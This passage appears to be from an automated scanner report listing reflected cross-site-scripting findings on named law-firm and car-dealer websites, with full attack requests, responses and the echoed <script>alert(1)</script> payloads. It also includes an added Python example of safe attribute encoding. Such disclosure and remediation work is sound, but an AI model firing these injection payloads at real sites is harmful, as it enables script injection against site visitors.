Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1071; path=/
Set-Cookie: PortletId=9201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uz23b055gmgirib1s10jpge4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97428
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1&print=true'); ">
...[SNIP]...

4.137. http://www.hoganlovells.com/aboutus/overview/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b2"><script>alert(1)</script>1f8b9cb08b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1068; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=4ljypr45ttlk0ufexlwxwq55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94280
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1&print=true'); ">
...[SNIP]...

4.138. http://www.hoganlovells.com/newsmedia/awardsrankings [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404ee"><script>alert(1)</script>3132bf1a85b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/awardsrankings?404ee"><script>alert(1)</script>3132bf1a85b=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=1srtawrostncgq24dtz2r1b4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?404ee"><script>alert(1)</script>3132bf1a85b=1&print=true'); ">
...[SNIP]...

4.139. http://www.hoganlovells.com/newsmedia/awardsrankings/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9966e"><script>alert(1)</script>9e3a488b625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=tgdjch55xqhztw2ucnfzrw45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1&print=true'); ">
...[SNIP]...

4.140. http://www.hoganlovells.com/newsmedia/fastfacts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984c4"><script>alert(1)</script>9caa5b51498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1188; path=/
Set-Cookie: PortletId=1199201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=3pnj2rusybze5e45ktwtjc45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95510
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1&print=true'); ">
...[SNIP]...

4.141. http://www.hoganlovells.com/newsmedia/newspubs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff387"><script>alert(1)</script>f5129b0d7e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/newspubs?ff387"><script>alert(1)</script>f5129b0d7e4=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=0afkoditkupm0a45bsb3rl55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ff387"><script>alert(1)</script>f5129b0d7e4=1&print=true'); ">
...[SNIP]...
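
Findings 4.141 through 4.145, 4.146/4.147 (path segments reflected into an img src attribute), 4.152 and 4.155 all have the same shape: an attacker-controlled name or path segment is written into a double-quoted attribute with no encoding, so the payload's first double quote ends the attribute and the remainder is parsed as new markup. The Python below is an added example, not code from the XSS.CX report or from any of the sites listed; it models the vulnerable onclick template seen in the response above beside a hardened version that URL-encodes the parameter name and then attribute-encodes the whole handler, and uses the standard library HTML parser as a stand-in for the browser to check whether a script element actually appears. The template strings and function names are assumptions for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Payload in the report's style: random prefix, attribute breakout, script, random suffix.
PAYLOAD = 'ff387"><script>alert(1)</script>f5129b0d7e4'
BASE = "http://www.hoganlovells.com/newsmedia/newspubs/"


def render_unsafe(param_name: str) -> str:
    """Assumed shape of the vulnerable template, inferred from the response:
    the raw parameter name lands inside a JavaScript URL literal that itself sits
    in a double-quoted onclick attribute. The payload's first '"' ends the attribute."""
    return (
        '<a href="javascript:void(0);" '
        "onclick=\"window.open('%s?%s=1&print=true'); \">" % (BASE, param_name)
    )


def render_safe(param_name: str) -> str:
    """Hardened template: encode once per context, innermost first.
    1. URL-encode the name so it is a plain query-string token.
    2. HTML-attribute-encode the whole attribute value so nothing can close the
       surrounding double quote or start a new tag."""
    url = "%s?%s=1&print=true" % (BASE, quote(param_name, safe=""))
    js = "window.open('%s');" % url
    return '<a href="javascript:void(0);" onclick="%s">' % html.escape(js, quote=True)


class TagInspector(HTMLParser):
    """Records what a tolerant HTML parser (a stand-in for the browser) sees:
    how many <script> start tags appear and the entity-decoded onclick value."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.onclick = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        elif tag == "a":
            self.onclick = dict(attrs).get("onclick")


def inspect(markup: str):
    """Return (number of <script> start tags, onclick value after entity decoding)."""
    p = TagInspector()
    p.feed(markup)
    p.close()
    return p.scripts, p.onclick


def payload_survives(markup: str, payload: str) -> bool:
    """True if the original parameter name can still be recovered from the
    rendering: correct encoding neutralises the payload without mangling data."""
    _, onclick = inspect(markup)
    return onclick is not None and payload in unquote(onclick)


if __name__ == "__main__":
    print("unsafe :", inspect(render_unsafe(PAYLOAD)))
    print("safe   :", inspect(render_safe(PAYLOAD)))
```

Encoding order matters here: the name is URL-encoded first because it is a query component, and the whole handler is attribute-encoded last because the attribute is the outermost context. Applying only the outer step would not help against a single quote in the name, since the browser decodes the entity back to a quote before the JavaScript runs.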

4.142. http://www.hoganlovells.com/newsmedia/newspubs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddef3"><script>alert(1)</script>32ec83aedd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=nqxi0l45ugjikt45htjgkszm; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1&print=true'); ">
...[SNIP]...

4.143. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6781"><script>alert(1)</script>141a5cc1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:13 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gnqers55ubowfiv34xrwdf55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166775
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1&print=true'); ">
...[SNIP]...

4.144. http://www.hoganlovells.com/newsmedia/timeline/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2644c"><script>alert(1)</script>bedf04dc077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:07 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1189; path=/
Set-Cookie: PortletId=1200201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fosfrm45vostudiwypgxb155; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114381
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1&print=true'); ">
...[SNIP]...

4.145. http://www.hoganlovells.com/ourpeople/List.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec2f0"><script>alert(1)</script>2daf70c6706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:23:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=sbdibi45oqlx1b45piq0vq45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2627156
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1&print=true'); ">
...[SNIP]...

4.146. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79e4"><script>alert(1)</script>00e92029aec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
